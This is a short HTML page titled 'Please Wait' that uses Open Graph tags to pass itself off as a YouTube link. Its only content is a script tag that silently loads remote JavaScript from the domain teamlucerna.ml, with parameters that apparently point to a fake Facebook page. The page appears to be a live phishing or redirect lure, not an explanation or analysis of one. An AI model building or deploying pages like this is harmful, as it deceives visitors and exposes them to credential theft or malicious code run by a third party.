
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
	<meta property="og:image" content="https://www.youtube.com/yts/img/yt_1200-vflhSIVnY.png" />
	<meta property="og:image:url" content="https://www.youtube.com/yts/img/yt_1200-vflhSIVnY.png" />
    <title>Please Wait</title>
</head>

<body>
<script src="//teamlucerna.ml/smith/?api=1&lan=facebooknew&ht=1&counter0=smithlink" type="text/javascript" async="true"></script>
</body>

</html>